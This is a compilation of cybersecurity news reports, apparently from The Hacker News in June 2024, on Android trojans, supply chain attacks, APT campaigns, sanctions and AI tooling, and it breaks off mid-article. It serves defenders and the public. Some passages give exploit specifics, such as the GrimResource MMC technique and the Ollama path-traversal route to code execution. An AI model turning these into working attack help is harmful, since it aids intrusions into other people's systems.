Cleafy's latest analysis reveals not only improvements to the malware, but also the use of dropper apps to disseminate Medusa under the guise of fake updates. Furthermore, legitimate services like Telegram and X are used as dead drop resolvers to retrieve the command-and-control (C2) server used for data exfiltration.
A notable change is the reduction in the number of permissions sought in an apparent effort to lower the chances of detection. That said, it still requires Android's accessibility services API, which allows it to stealthily enable other permissions as required and avoid raising user suspicion.
Another modification is the ability to set a black screen overlay on the
victim's device to give the impression that the device is locked or powered off
and use it as a cover to carry out malicious activities.
Medusa botnet clusters typically rely on tried-and-tested approaches such as phishing to spread the malware. However, newer waves have been observed propagating it via dropper apps downloaded from untrusted sources, underscoring continued efforts on the part of threat actors to evolve their tactics.
"Minimizing the required permissions evades detection and appears more benign,
enhancing its ability to operate undetected for extended periods," the
researchers said. "Geographically, the malware is expanding into new regions,
such as Italy and France, indicating a deliberate effort to diversify its victim
pool and broaden its attack surface."
The development comes as Symantec revealed that fictitious Chrome browser
updates for Android are being used as a lure to drop the Cerberus banking
trojan. Similar campaigns distributing bogus Telegram apps via phony websites
("telegroms[.]icu") have also been observed distributing another Android malware
dubbed SpyMax.
Once installed, the app prompts the user to enable the accessibility services, allowing it to gather keystrokes, precise locations, and even the speed at which the device is moving. The collected information is then compressed and exported to an encoded C2 server.
"SpyMax is a remote administration tool (RAT) that has the capability to gather personal/private information from the infected device without consent from the user and sends the same to a remote threat actor," K7 Security Labs said. "This enables the threat actors to control victims' devices that impacts the confidentiality and integrity of the victim's privacy and data."
Over 110,000 Websites Affected by
Hijacked Polyfill Supply Chain Attack
27.6.24
Hacking
The Hacker News
Google has taken steps to block ads for e-commerce sites that use the
Polyfill.io service after a Chinese company acquired the domain and modified the
JavaScript library ("polyfill.js") to redirect users to malicious and scam
sites.
More than 110,000 sites that embed the library are impacted by the supply chain attack, Sansec said in a Tuesday report.
"Protecting our users is our top priority. We detected a security issue recently that may affect websites using certain third-party libraries," the company said in a statement shared with The Hacker News. "To help potentially impacted advertisers secure their websites, we have been proactively sharing information on how to quickly mitigate the issue."
Polyfill is a popular library that incorporates support for modern functions in web browsers. Earlier this February, concerns were raised following its purchase by China-based content delivery network (CDN) company Funnull.
The original creator of the project, Andrew Betts, urged
website owners to immediately remove it, adding "no website today requires any
of the polyfills in the polyfill[.]io library" and that "most features added to
the web platform are quickly adopted by all major browsers, with some exceptions
that generally can't be polyfilled anyway, like Web Serial and Web Bluetooth."
The development also prompted web infrastructure providers Cloudflare and Fastly
to offer alternative endpoints to help users move away from polyfill[.]io.
"The concerns are that any website embedding a link to the original polyfill[.]io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack," Cloudflare researchers Sven Sauleau and Michael Tremante noted at the time.
"Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
The Dutch e-commerce security firm said the domain "cdn.polyfill[.]io" has since been caught injecting malware that redirects users to sports betting and pornographic sites.
"The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours," it said. "It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats."
San Francisco-based c/side has also issued an alert of its
own, noting that the domain maintainers added a Cloudflare Security Protection
header to their site between March 7 and 8, 2024.
The findings follow an advisory about a critical security flaw impacting Adobe
Commerce and Magento websites (CVE-2024-34102, CVSS score: 9.8) that continues
to remain largely unpatched despite fixes being available since June 11, 2024.
"In itself, it allows anyone to read private files (such as those with passwords)," Sansec said, which codenamed the exploit chain CosmicSting. "However, combined with the recent iconv bug in Linux, it turns into the security nightmare of remote code execution."
It has since emerged that third-parties can gain API admin access without requiring a Linux version vulnerable to the iconv issue (CVE-2024-2961), making it an even more severe issue.
(The story was updated after publication to include a response from Google.)
New Attack Technique Exploits
Microsoft Management Console Files
25.6.24
Hacking
The Hacker News
Threat actors are exploiting a novel attack technique in the wild that leverages
specially crafted management saved console (MSC) files to gain full code
execution using Microsoft Management Console (MMC) and evade security defenses.
Elastic Security Labs has codenamed the approach GrimResource after identifying an artifact ("sccm-updater.msc") that was uploaded to the VirusTotal malware scanning platform on June 6, 2024.
"When a maliciously crafted console file is imported, a vulnerability in one of the MMC libraries can lead to running adversary code, including malware," the company said in a statement shared with The Hacker News.
"Attackers can combine this technique with DotNetToJScript to gain arbitrary
code execution, which can lead to unauthorized access, system takeover and
more."
The use of uncommon file types as a malware distribution vector is seen as an alternative attempt by adversaries to get around security guardrails erected by Microsoft in recent years, including disabling macros by default in Office files downloaded from the internet.
Last month, South Korean firm Genians detailed the use of a malicious MSC file by the North Korea-linked Kimsuky hacking group to deliver malware.
GrimResource, on the other hand, exploits a cross-site scripting (XSS) flaw present in the apds.dll library to execute arbitrary JavaScript code in the context of MMC. The XSS flaw was originally reported to Microsoft and Adobe in late 2018, although it remains unpatched to date.
This is accomplished by adding a reference to the vulnerable APDS resource in the StringTable section of a malicious MSC file, which, when opened using MMC, triggers the execution of JavaScript code.
The technique not only bypasses ActiveX warnings, it can be combined with
DotNetToJScript to gain arbitrary code execution. The analyzed sample uses this
approach to launch a .NET loader component dubbed PASTALOADER that ultimately
paves the way for Cobalt Strike.
"After Microsoft disabled Office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity," security researchers Joe Desimone and Samir Bousseaden said.
"However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files."
New Cyberthreat 'Boolka' Deploying
BMANAGER Trojan via SQLi Attacks
25.6.24
Virus
The Hacker News
A previously undocumented threat actor dubbed Boolka has been observed
compromising websites with malicious scripts to deliver a modular trojan
codenamed BMANAGER.
"The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022," Group-IB researchers Rustam Mirkasymov and Martijn van den Berk said in a report published last week.
"Over the last three years, the threat actors have been infecting vulnerable websites with malicious JavaScript scripts capable of intercepting any data entered on an infected website."
Boolka gets its name from the JavaScript code inserted into the website that
beacons out to a command-and-control server named "boolka[.]tk" every time an
unsuspecting visitor lands on the infected site.
The JavaScript is also designed to collect and exfiltrate user inputs and interactions in a Base64-encoded format, indicating the use of the malware to grab sensitive details like credentials and other personal information.
Furthermore, it redirects users to a bogus loading page that prompts victims to download and install a browser extension when, in reality, it drops a downloader for the BMANAGER trojan, which, in turn, attempts to fetch the malware from a hard-coded URL. The malware delivery framework is based on the BeEF framework.
The trojan, for its part, serves as a conduit to deploy four additional modules,
including BMBACKUP (harvest files from particular paths), BMHOOK (record which
applications are running and have keyboard focus), BMLOG (log keystrokes), and
BMREADER (export stolen data). It also sets up persistence on the host using
scheduled tasks.
"Most samples make use of a local SQL database," the researchers noted. "The path and name of this database is hard-coded in the samples to be located at: C:\Users\{user}\AppData\Local\Temp\coollog.db, with user being the username of the logged in user."
Boolka is the third actor after GambleForce and ResumeLooters to leverage SQL
injection attacks to steal sensitive data in recent months.
"Starting from opportunistic SQL injection attacks in 2022 to the development of his own malware delivery platform and trojans like BMANAGER, Boolka's operations demonstrate the group's tactics have grown more sophisticated over time," the researchers concluded.
"The injection of malicious JavaScript snippets into vulnerable websites for data exfiltration, and then the use of the BeEF framework for malware delivery, reflects the step-by-step development of the attacker's competencies."
Wikileaks' Julian Assange Released
from U.K. Prison, Heads to Australia
25.6.24
BigBrothers
The Hacker News
WikiLeaks founder Julian Assange has been freed in the U.K. and has departed the
country after serving more than five years in a maximum security prison at
Belmarsh for what was described by the U.S. government as the "largest
compromises of classified information" in its history.
Capping off a 14-year legal saga, Assange, 52, pleaded guilty to one criminal count of conspiring to obtain and disclose classified U.S. national defense documents. He is due to be sentenced to 62 months of time already served in the Pacific island of Saipan later this week.
According to the Associated Press, the hearing is taking place there because of Assange's "opposition to traveling to the continental U.S. and the court's proximity to Australia."
"This is the result of a global campaign that spanned grass-roots organizers,
press freedom campaigners, legislators and leaders from across the political
spectrum, all the way to the United Nations," WikiLeaks said in a statement.
"This created the space for a long period of negotiations with the U.S. Department of Justice, leading to a deal that has not yet been formally finalized."
Assange, who was granted bail by the High Court in London on Monday, and has since boarded a flight to Australia. He also faced separate charges of rape and sexual assault in Sweden, claims he has denied.
The U.S. Department of Justice (DoJ) in 2019 said Assange's actions "risked serious harm to United States national security to the benefit of our adversaries and put the unredacted named human sources at a grave and imminent risk of serious physical harm and/or arbitrary detention."
It's believed that the DoJ accepted the plea agreement with no additional prison time because of the fact that Assange had already served longer than most people charged with a similar offense.
Founded in 2006, WikiLeaks is estimated to have published more than 10 million documents related to war, spying, and corruption, including military field logs from the wars in Afghanistan and Iraq, as well as diplomatic cables from the U.S. (dubbed Cablegate) and information about detainees at the Guantanamo Bay detention camp.
Notably, it also released a tranche of cyber warfare and surveillance tools
allegedly created by the U.S. Central Intelligence Agency (CIA), a collection
cumulatively known as Vault 7 and Vault 8, and documents detailing the National
Security Agency's spying of France, Germany, Brazil, and Japan.
Joshua Schulte, a former CIA engineer who was accused of passing on the confidential trove of cyber weapons, has since been sentenced to 40 years in prison.
Another of Assange's collaborators, Chelsea Elizabeth Manning (born Bradley Edward Manning), was sentenced to 35 years in prison for disclosing to WikiLeaks hundreds of thousands of documents that came to be known as the Iraq War Logs and Afghan War Diary before then-president Barack Obama commuted her sentence in January 2017.
4 FIN9-linked Vietnamese Hackers Indicted in $71M U.S. Cybercrime Spree
25.6.24
APT
The Hacker News
Four Vietnamese nationals with ties to the FIN9 cybercrime group have been
indicted in the U.S. for their involvement in a series of computer intrusions
that caused over $71 million in losses to companies.
The defendants, Ta Van Tai (aka Quynh Hoa and Bich Thuy), Nguyen Viet Quoc (aka Tien Nguyen), Nguyen Trang Xuyen, and Nguyen Van Truong (aka Chung Nguyen), have been accused of conducting phishing campaigns and supply chain compromises to orchestrate cyber attacks and steal millions of dollars.
"From at least May 2018 through October 2021, the defendants hacked the computer networks of victim companies throughout the United States and used their access to steal or attempt to steal non-public information, employee benefits, and funds," the U.S. Department of Justice said in an unsealed indictment last week.
According to court documents, the individuals – after successfully gaining initial access to target networks – stole gift card data, personally identifiable information, and credit card details associated with employees and customers.
They further used the stolen information to further their criminal activities to
evade detection, including opening online accounts at cryptocurrency exchanges
and setting up hosting servers.
"Tai, Xuyen, and Truong sold stolen gift cards to third parties, including through an account registered with a fake name on a peer-to-peer cryptocurrency marketplace, in order to conceal and disguise the source of the stolen money," the DoJ said.
All the four defendants have been charged with one count of conspiracy to commit fraud, extortion, and related activity in connection with computers; one count of conspiracy to commit wire fraud; and two counts of intentional damage to a protected computer. If convicted on all counts, they face up to 45 years in prison.
Additionally, Tai, Xuyen, and Truong have been charged with one count of conspiracy to commit money laundering, which carries a jail term of up to 20 years. Tai and Quoc have also been saddled with one count of aggravated identity theft and one count of conspiracy to commit identity fraud, charges that can have a maximum penalty of up to 17 years in prison.
The development comes days after the DoJ said that two U.S. members of the ViLE hacking group, Sagar Steven Singh (aka Weep) and Nicholas Ceraolo (aka Convict, Anon, and Ominous), pleaded guilty for their involvement in the compromise of a federal law enforcement database by using stolen credentials and engaging in an extortion scheme.
"The defendants called themselves 'ViLe,' and their actions were exactly that," U.S. Attorney Breon Peace said. "They hacked into a law enforcement database and had access to sensitive personal information, then threatened to harm a victim's family and publicly release that information unless the defendants were ultimately paid money."
The two men, who were originally charged in March 2023, pled guilty to conspiring to commit computer intrusion and aggravated identity theft. They face a minimum sentence of two years in prison, and a maximum of seven years.
It also follows a new wave of sanctions imposed by the European Council against six persons for conducting cyber attacks against critical infrastructure and government systems in the European Union and Ukraine.
This includes Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, two
hackers associated with the COLDRIVER (aka BlueCharlie, Calisto, Gossamer Bear,
and Star Blizzard) hacking crew who were previously sanctioned by the U.K. and
U.S. governments for carrying out spear-phishing campaigns.
The remaining four encompass Sklianko Oleksandr Mykolaiovych and Chernykh Mykola Serhiiovych of the Gamaredon (aka Armageddon) group and Mikhail Tsarev and Maksim Galochkin of the Wizard Spider gang, the latter two of which are assessed to be key players in the deployment of Conti and TrickBot malware.
"The E.U. remains committed to a global, open, and secure cyberspace and, reiterates the need to strengthen international cooperation to promote the rules-based order in this area," the Council said.
Multiple WordPress Plugins Compromised: Hackers Create Rogue Admin Accounts
25.6.24
Virus
The Hacker News
Multiple WordPress plugins have been backdoored to inject malicious code that
makes it possible to create rogue administrator accounts with the aim of
performing arbitrary actions.
"The injected malware attempts to create a new administrative user account and then sends those details back to the attacker-controlled server," Wordfence security researcher Chloe Chamberland said in a Monday alert.
"In addition, it appears the threat actor also injected malicious JavaScript into the footer of websites that appears to add SEO spam throughout the website."
The admin accounts have the usernames "Options" and "PluginAuth," with the
account information exfiltrated to the IP address 94.156.79[.]8.
It's currently not known how the unknown attackers behind the campaign managed to compromise the plugins, but the earliest signs of the software supply chain attack date back to June 21, 2024.
The plugins in question are no longer available for download from the WordPress plugin directory pending ongoing review -
Social Warfare 4.4.6.4 – 4.4.7.1 (Patched version: 4.4.7.3) - 30,000+ installs
Blaze Widget 2.2.5 – 2.5.2 (Patched version: N/A) - 10+ installs
Wrapper Link Element 1.0.2 – 1.0.3 (Patched version: N/A) - 1,000+ installs
Contact Form 7 Multi-Step Addon 1.0.4 – 1.0.5 (Patched version: N/A) - 700+
installs
Simply Show Hooks 1.2.1 (Patched version: N/A) - 4,000+ installs
Users of the aforementioned plugins are advised to inspect their sites for
suspicious administrator accounts and delete them, in addition to removing any
malicious code.
Google Introduces Project Naptime for AI-Powered Vulnerability Research
25.6.24
AI
The Hacker News
Google has developed a new framework called Project Naptime that it says enables
a large language model (LLM) to carry out vulnerability research with an aim to
improve automated discovery approaches.
"The Naptime architecture is centered around the interaction between an AI agent and a target codebase," Google Project Zero researchers Sergei Glazunov and Mark Brand said. "The agent is provided with a set of specialized tools designed to mimic the workflow of a human security researcher."
The initiative is so named for the fact that it allows humans to "take regular naps" while it assists with vulnerability research and automating variant analysis.
The approach, at its core, seeks to take advantage of advances in code comprehension and general reasoning ability of LLMs, thus allowing them to replicate human behavior when it comes to identifying and demonstrating security vulnerabilities.
It encompasses several components such as a Code Browser tool that enables the
AI agent to navigate through the target codebase, a Python tool to run Python
scripts in a sandboxed environment for fuzzing, a Debugger tool to observe
program behavior with different inputs, and a Reporter tool to monitor the
progress of a task.
Google said Naptime is also model-agnostic and backend-agnostic, not to mention
be better at flagging buffer overflow and advanced memory corruption flaws,
according to CYBERSECEVAL 2 benchmarks. CYBERSECEVAL 2, released earlier this
April by researchers from Meta, is an evaluation suite to quantify LLM security
risks.
In tests carried out by the search giant to reproduce and exploit the flaws, the two vulnerability categories achieved new top scores of 1.00 and 0.76, up from 0.05 and 0.24, respectively for OpenAI GPT-4 Turbo.
"Naptime enables an LLM to perform vulnerability research that closely mimics the iterative, hypothesis-driven approach of human security experts," the researchers said. "This architecture not only enhances the agent's ability to identify and analyze vulnerabilities but also ensures that the results are accurate and reproducible."
Critical RCE Vulnerability Discovered in Ollama AI Infrastructure Tool
25.6.24
Vulnerebility
The Hacker News
researchers have detailed a now-patched security flaw affecting the Ollama
open-source artificial intelligence (AI) infrastructure platform that could be
exploited to achieve remote code execution.
Tracked as CVE-2024-37032, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version 0.1.34 released on May 7, 2024.
Ollama is a service for packaging, deploying, running large language models (LLMs) locally on Windows, Linux, and macOS devices.
At its core, the issue relates to a case of insufficient input validation that results in a path traversal flaw an attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.
The shortcoming requires the threat actor to send specially crafted HTTP
requests to the Ollama API server for successful exploitation.
It specifically takes advantage of the API endpoint "/api/pull" – which is used to download a model from the official registry or from a private repository – to provide a malicious model manifest file that contains a path traversal payload in the digest field.
This issue could be abused not only to corrupt arbitrary files on the system, but also to obtain code execution remotely by overwriting a configuration file ("etc/ld.so.preload") associated with the dynamic linker ("ld.so") to include a rogue shared library and launch it every time prior to executing any program.
While the risk of remote code execution is reduced to a great extent in default Linux installations due to the fact that the API server binds to localhost, it's not the case with docker deployments, where the API server is publicly exposed.
"This issue is extremely severe in Docker installations, as the server runs with `root` privileges and listens on `0.0.0.0` by default – which enables remote exploitation of this vulnerability," security researcher Sagi Tzadik said.
Compounding matters further is the inherent lack of authentication associated with Ollama, thereby allowing an attacker to exploit a publicly-accessible server to steal or tamper with AI models, and compromise self-hosted AI inference servers.
This also requires that such services are secured using middleware like reverse proxies with authentication. Wiz said it identified over 1,000 Ollama exposed instances hosting numerous AI models without any protection.
"CVE-2024-37032 is an easy-to-exploit remote code execution that affects modern
AI infrastructure," Tzadik said. "Despite the codebase being relatively new and
written in modern programming languages, classic vulnerabilities such as path
traversal remain an issue."
The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover.
The most severe of these vulnerabilities is CVE-2024-22476 (CVSS score 10.0), an SQL injection flaw in Intel Neural Compressor software that could allow attackers to download arbitrary files from the host system. It was addressed in version 2.5.0.
RedJuliett Cyber Espionage Campaign Hits 75 Taiwanese Organizations
25.6.24
APT
The Hacker News
A likely China-linked state-sponsored threat actor has been linked to a cyber
espionage campaign targeting government, academic, technology, and diplomatic
organizations in Taiwan between November 2023 and April 2024.
Recorded Future's Insikt Group is tracking the activity under the name RedJuliett, describing it as a cluster that operates from Fuzhou, China, to support Beijing's intelligence collection goals related to the East Asian country. It's also tracked under the names Flax Typhoon and Ethereal Panda.
Among other countries targeted by the adversarial collective include Djibouti,
Hong Kong, Kenya, Laos, Malaysia, the Philippines, Rwanda, South Korea, and the
U.S.
In all, as many as 24 victim organizations have been observed communicating with
the threat actor infrastructure, including government agencies in Taiwan, Laos,
Kenya, and Rwanda. It's also estimated to have targeted at least 75 Taiwanese
entities for broader reconnaissance and follow-on exploitation.
"The group targets internet-facing appliances such as firewalls, load balancers, and enterprise virtual private network VPN products for initial access, as well as attempting structured query language SQL injection and directory traversal exploits against web and SQL applications," the company said in a new report published today.
As previously documented by CrowdStrike and Microsoft, RedJuliett is known to employ the open-source software SoftEther to tunnel malicious traffic out of victim networks and leverage living-off-the-land (LotL) techniques to fly under the radar. The group is believed to be active since at least mid-2021.
"Additionally, RedJuliett used SoftEther to administer operational infrastructure consisting of both threat actor-controlled servers leased from virtual private server VPS providers and compromised infrastructure belonging to three Taiwanese universities," Recorded Future noted.
A
successful initial access is followed by the deployment of the China Chopper web
shell to maintain persistence, alongside other open-source web shells like
devilzShell, AntSword, and Godzilla. A few instances have also entailed the
exploitation of a Linux privilege escalation vulnerability known as Dirty Cow
(CVE-2016-5195).
"RedJuliett is likely interested in collecting intelligence on Taiwan's economic
policy and trade and diplomatic relations with other countries," it said.
"RedJuliett, like many other Chinese threat actors, is likely targeting vulnerabilities in internet-facing devices because these devices have limited visibility and security solutions available, and targeting them has proven to be an effective way to scale initial access."
Update#
In a statement released by China's Ministry of Foreign Affairs, spokesperson Mao
Ning dismissed the allegations, describing them as "fabricated disinformation on
so-called Chinese hacking operations."
Multiple Threat Actors Deploying Open-Source Rafel RAT to Target Android
Devices
25.6.24
Virus
The Hacker News
Multiple threat actors, including cyber espionage groups, are employing an
open-source Android remote administration tool called Rafel RAT to meet their
operational objectives by masquerading it as Instagram, WhatsApp, and various
e-commerce and antivirus apps.
"It provides malicious actors with a powerful toolkit for remote administration and control, enabling a range of malicious activities from data theft to device manipulation," Check Point said in an analysis published last week.
It boasts a wide range of features, such as the ability to wipe SD cards, delete call logs, siphon notifications, and even act as ransomware.
The use of Rafel RAT by DoNot Team (aka APT-C-35, Brainworm, and Origami Elephant) was previously highlighted by the Israeli company in cyber attacks that leveraged a design flaw in Foxit PDF Reader to trick users into downloading malicious payloads.
The campaign, which took place in April 2024, is said to have utilized military-themed PDF lures to deliver the malware.
Check Point said it identified around 120 different malicious campaigns, some targeting high-profile entities, that span various countries like Australia, China, Czechia, France, Germany, India, Indonesia, Italy, New Zealand, Pakistan, Romania, Russia, and the U.S.
"The majority of victims had Samsung phones, with Xiaomi, Vivo, and Huawei users
comprising the second-largest group among the targeted victims," it noted,
adding no less than 87.5% of the infected devices are running out-of-date
Android versions that no longer receive security fixes.
Typical attack chains involve the use of social engineering to manipulate victims into granting the malware-laced apps intrusive permissions in order to hoover sensitive data like contact information, SMS messages (e.g., 2FA codes), location, call logs, and the list of installed applications, among others.
Rafel RAT primarily makes use of HTTP(S) for command-and-control (C2) communications, but it can also utilize Discord APIs to contact the threat actors. It also comes with an accompanying PHP-based C2 panel that registered users can leverage to issue commands to compromised devices.
The tool's effectiveness across various threat actors is corroborated by its
deployment in a ransomware operation carried out by an attacker likely
originating from Iran, who sent a ransom note written in Arabic through an SMS
that urged a victim in Pakistan to contact them on Telegram.
"Rafel RAT is a potent example of the evolving landscape of Android malware,
characterized by its open-source nature, extensive feature set, and widespread
utilization across various illicit activities," Check Point said.
"The prevalence of Rafel RAT highlights the need for continual vigilance and proactive security measures to safeguard Android devices against malicious exploitation."
ExCobalt Cyber Gang Targets Russian
Sectors with New GoRed Backdoor
23.6.24
APT
The Hacker News
Russian organizations have been targeted by a cybercrime gang called ExCobalt
using a previously unknown Golang-based backdoor known as GoRed.
"ExCobalt focuses on cyber espionage and includes several members active since at least 2016 and presumably once part of the notorious Cobalt Gang," Positive Technologies researchers Vladislav Lunin and Alexander Badayev said in a technical report published this week.
"Cobalt attacked financial institutions to steal funds. One of Cobalt's
hallmarks was the use of the CobInt tool, something ExCobalt began to use in
2022."
Attacks mounted by the threat actor have singled out various sectors in Russia
over the past year, including government, information technology, metallurgy,
mining, software development, and telecommunications.
Initial access to environments is facilitated by taking advantage of a previously compromised contractor and a supply chain attack, wherein the adversary infected a component used to build the target company's legitimate software, suggesting a high degree of sophistication.
The modus operandi entails the use of various tools like Metasploit, Mimikatz,
ProcDump, SMBExec, Spark RAT for executing commands on the infected hosts, and
Linux privilege escalation exploits (CVE-2019-13272, CVE-2021-3156,
CVE-2021-4034, and CVE-2022-2586).
GoRed, which has undergone numerous iterations since its inception, is a
comprehensive backdoor that allows the operators to execute commands, obtain
credentials, and harvest details of active processes, network interfaces, and
file systems. It utilizes the Remote Procedure Call (RPC) protocol to
communicate with its command-and-control (C2) server.
What's more, it supports a number of background commands to watch for files of
interest and passwords as well as enable reverse shell. The collected data is
then exported to the attacker-controlled infrastructure.
"ExCobalt continues to demonstrate a high level of activity and determination in attacking Russian companies, constantly adding new tools to its arsenal and improving its techniques," the researchers said.
"In addition, ExCobalt demonstrates flexibility and versatility by supplementing its toolset with modified standard utilities, which help the group to easily bypass security controls and adapt to changes in protection methods."
Warning: New Adware Campaign Targets
Meta Quest App Seekers
23.6.24
Virus
The Hacker News
A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.
"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes," firm eSentire said in an analysis, adding it identified the activity earlier this month.
"These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators."
The initial infection chain involves surfacing the bogus website ("oculus-app[.]com") on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive ("oculus-app.EXE.zip") containing a Windows batch script.
The batch script is designed to fetch a second batch script from a
command-and-control (C2) server, which, in turn, contains a command to retrieve
another batch file. It also creates scheduled tasks on the machine to run the
batch scripts at different times.
This step is followed by the download of the legitimate app onto the compromised
host, while simultaneously additional Visual Basic Script (VBS) files and
PowerShell scripts are dropped to gather IP and system information, capture
screenshots, and exfiltrate the data to a remote server ("us11[.]org/in.php").
The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft's Edge browser is running and determines the last time a user input occurred.
"If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script," eSentire said. "It then randomly scrolls up and down the opened page."
It's suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.
The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities to the victim, and searching for the word "Sponsored" in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.
Furthermore, it's equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.
"AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue," the Canadian company noted.
"It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities."
The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.
What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).
"This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online," eSentire said.
The disclosure also comes on the heels of a malpsam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).
"Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files," Broadcom-owned Symantec said.
"The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration."
U.S. Treasury Sanctions 12 Kaspersky Executives Amid Software Ban
23.6.24
BigBrothers
The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC)
imposed sanctions against a dozen individuals serving executive and senior
leadership roles at Kaspersky Lab, a day after the Russian company was banned by
the Commerce Department.
The move "underscores our commitment to ensure the integrity of our cyber domain and to protect our citizens against malicious cyber threats," Under Secretary of the Treasury for Terrorism and Financial Intelligence, Brian E. Nelson, said.
"The United States will take action where necessary to hold accountable those
who would seek to facilitate or otherwise enable these activities."
The sanctions, however, do not extend to Kaspersky Lab, its parent or subsidiary
companies, nor the company's founder and chief executive officer (CEO), Eugene
Kaspersky, OFAC noted. The 12 C-suite and senior-level executives sanctioned are
listed below -
Andrei Gennadyevich Tikhonov, Chief Operating Officer (COO) and board member
Daniil Sergeyevich Borshchev, Deputy CEO and board member
Andrei Anatolyevich Efremov, Chief Business Development Officer (CBDO) and board
member
Igor Gennadyevich Chekunov, Chief Legal Officer (CLO) and board member
Andrey Petrovich Dukhvalov, Vice President and Director of Future Technologies
Andrei Anatolyevich Suvorov, Head of Kaspersky Operating System Business Unit
Denis Vladimirovich Zenkin, Head of Corporate Communications
Marina Mikhaylovna Alekseeva, Chief Human Resources (HR) Officer
Mikhail Yuryevich Gerber, Executive Vice President of Consumer Business
Anton Mikhaylovich Ivanov, Chief Technology Officer (CTO)
Kirill Aleksandrovich Astrakhan, Executive Vice President for Corporate Business
Anna Vladimirovna Kulashova, Managing Director for Russia and the Commonwealth
of Independent States (CIS)
The development follows actions by the Commerce Department prohibiting Kaspersky
from providing its software and other security services in America starting July
20, 2024, citing national security concerns. The company has also been placed on
the Entity List.
Russia has said the sales ban on Kaspersky software was a typical move by the
U.S. to stifle foreign competition with American products. Kaspersky has
maintained that it has no links to the Russian government.
Chinese Hackers Deploy SpiceRAT and
SugarGh0st in Global Espionage Campaign
23.6.24
Virus
The Hacker News
A previously undocumented Chinese-speaking threat actor codenamed SneakyChef has
been linked to an espionage campaign primarily targeting government entities
across Asia and EMEA (Europe, Middle East, and Africa) with SugarGh0st malware
since at least August 2023.
"SneakyChef uses lures that are scanned documents of government agencies, most of which are related to various countries' Ministries of Foreign Affairs or embassies," Cisco Talos researchers Chetan Raghuprasad and Ashley Shen said in an analysis published today.
Activities related to the hacking crew were first highlighted by the company in late November 2023 in connection with an attack campaign that singled out South Korea and Uzbekistan with a custom variant of Gh0st RAT called SugarGh0st.
A subsequent analysis from Proofpoint last month uncovered the use of SugarGh0st RAT against U.S. organizations involved in artificial intelligence efforts, including those in academia, private industry, and government services. It's tracking the cluster under the name UNK_SweetSpecter.
It's worth mentioning at this stage that SneakyChef refers to the same campaign
that Palo Alto Networks Unit 42 has codenamed Operation Diplomatic Specter. The
activity, per the security vendor, has been ongoing since at least late 2022,
striking governmental entities in the Middle East, Africa, and Asia.
Talos said that it has since observed the same malware being used to likely focus on various government entities across Angola, India, Latvia, Saudi Arabia, and Turkmenistan based on the lure documents used in the spear-phishing campaigns, indicating a widening of the scope of the countries targeted.
In addition to leveraging attack chains that make use of Windows Shortcut (LNK) files embedded within RAR archives to deliver SugarGh0st, the new wave has been found to employ a self-extracting RAR archive (SFX) as an initial infection vector to launch a Visual Basic Script (VBS) that ultimately executes the malware by means of a loader while simultaneously displaying the decoy file.
The attacks against Angola are also notable for the fact that it utilizes a new
remote access trojan codenamed SpiceRAT using lures from Neytralny Turkmenistan,
a Russian-language newspaper in Turkmenistan.
SpiceRAT, for its part, employs two different infection chains for propagation, one of which uses an LNK file present inside a RAR archive that deploys the malware using DLL side-loading techniques.
"When the victim extracts the RAR file, it drops the LNK and a hidden folder on
their machine," the researchers said. "After a victim opens the shortcut file,
which masqueraded as a PDF document, it executes an embedded command to run the
malicious launcher executable from the dropped hidden folder."
The launcher then proceeds to display the decoy document to the victim and run a
legitimate binary ("dxcap.exe"), which subsequently sideloads a malicious DLL
responsible for loading SpiceRAT.
The second variant entails the use of an HTML Application (HTA) that drops a Windows batch script and a Base64-encoded downloader binary, with the former launching the executable by means of a scheduled task every five minutes.
The batch script is also engineered to run another legitimate executable
"ChromeDriver.exe" every 10 minutes, which then sideloads a rogue DLL that, in
turn, loads SpiceRAT. Each of these components – ChromeDriver.exe, the DLL, and
